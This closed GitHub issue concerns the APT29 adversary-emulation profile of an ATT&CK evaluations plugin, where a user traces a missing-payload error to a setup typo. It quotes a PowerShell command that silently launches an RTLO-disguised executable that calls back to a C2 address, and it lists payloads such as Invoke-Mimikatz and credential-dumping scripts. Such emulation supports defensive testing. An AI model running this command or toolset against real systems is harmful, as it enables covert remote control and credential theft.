Closed Nexx1c closed 3 years ago
Hi,
I'm getting an error stating that the payload wasn't found when running the ATT&CK Eval APT29 - Day 1 profile:
Sleep 3;$bin = Get-ChildItem *cod*scr*;$arguments = '-server "http://40.87.138.119:8888" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;}
__________________________
Payload(s) not available:
Most other actions seem to be working well: https://i.imgur.com/4z37FG5.png
The payload seems to exist in plugins/evals/payloads:
root@28323b9446f0:/usr/src/app/plugins/evals/payloads# ls
2016_United_States_presidential_election_-_Wikipedia.html StealToken.ps1 rar.exe stepSeventeen_zip.ps1 File-Collection.ps1 cod.3aka.scr.exe sandcat.go-windows stepSixteen_SID.ps1 Get-Screenshot.ps1 dmevals.local.pfx sandcat.go-windows-upx stepThirteen.ps1 Invoke-BypassUACTokenManipulation.ps1 invoke-winrmsession.ps1 schemas.ps1 stepTwelve.ps1 Invoke-Mimikatz.ps1 m.exe setup.py timestomp.ps1 Invoke-PSInject.ps1 make_lnk.ps1 stepFifteen_wmi.ps1 update.ps1 MITRE-ATTACK-EVALS.HTML monkey.png stepFourteen_bypassUAC.ps1 upload.ps1 Modified-SysInternalsSuite.zip powerview.ps1 stepFourteen_credDump.ps1 wipe.ps1 README.md ps.ps1 stepSeventeen_email.ps1 ''$'\342\200\256''cod.3aka.scr.exe'
I'm running v 2.6.6 in a docker if that could be causing any issues?
Found the issue.... Just wrote the IP without http:// and :port when running the setup.py... -_-